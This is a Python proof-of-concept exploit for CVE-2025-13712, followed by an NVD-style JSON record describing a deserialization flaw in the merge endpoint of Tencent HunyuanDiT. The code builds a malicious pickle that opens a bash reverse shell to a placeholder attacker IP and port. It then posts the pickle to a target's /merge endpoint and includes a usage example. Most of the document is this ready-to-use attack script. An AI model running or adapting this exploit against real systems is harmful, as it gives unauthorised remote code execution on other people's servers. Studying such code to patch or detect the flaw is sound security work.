CVE-2025-13712

import requests import pickle import base64 import os # CVE-2025-13712 PoC - HunyuanDiT merge endpoint deserialization RCE # Target: Tencent HunyuanDiT merge endpoint class Exploit: def __reduce__(self): # Reverse shell payload - change IP/PORT as needed cmd = "bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1" return (os.system, (cmd,)) def generate_malicious_payload(): """Generate malicious pickle payload for deserialization attack""" exploit = Exploit() payload = pickle.dumps(exploit) return base64.b64encode(payload).decode() def exploit_hunyuan_dit(target_url): """ Exploit HunyuanDiT merge endpoint deserialization vulnerability Args: target_url: Base URL of vulnerable HunyuanDiT instance Returns: bool: True if exploit sent successfully, False otherwise """ payload = generate_malicious_payload() # Target the merge endpoint with malicious serialized data endpoint = f"{target_url}/merge" # Craft request with malicious payload data = { "model_data": payload, "merge_strategy": "weighted", "weights": [0.5, 0.5] } headers = { "Content-Type": "application/json", "User-Agent": "HunyuanDiT-Client/1.0" } try: response = requests.post(endpoint, json=data, headers=headers, timeout=10) return response.status_code == 200 except requests.exceptions.RequestException: return False if __name__ == "__main__": # Usage example target = "http://target:8080" exploit_hunyuan_dit(target)

{"cve": {"id": "CVE-2025-13712", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:45.953", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tencent HunyuanDiT merge Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the merge endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27190."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/Tencent-Hunyuan/HunyuanDiT/commit/d2cb9cde5c9dc6a6c01735dcb92fe7699ddf6bc5", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1028/", "source": "[email protected]"}]}}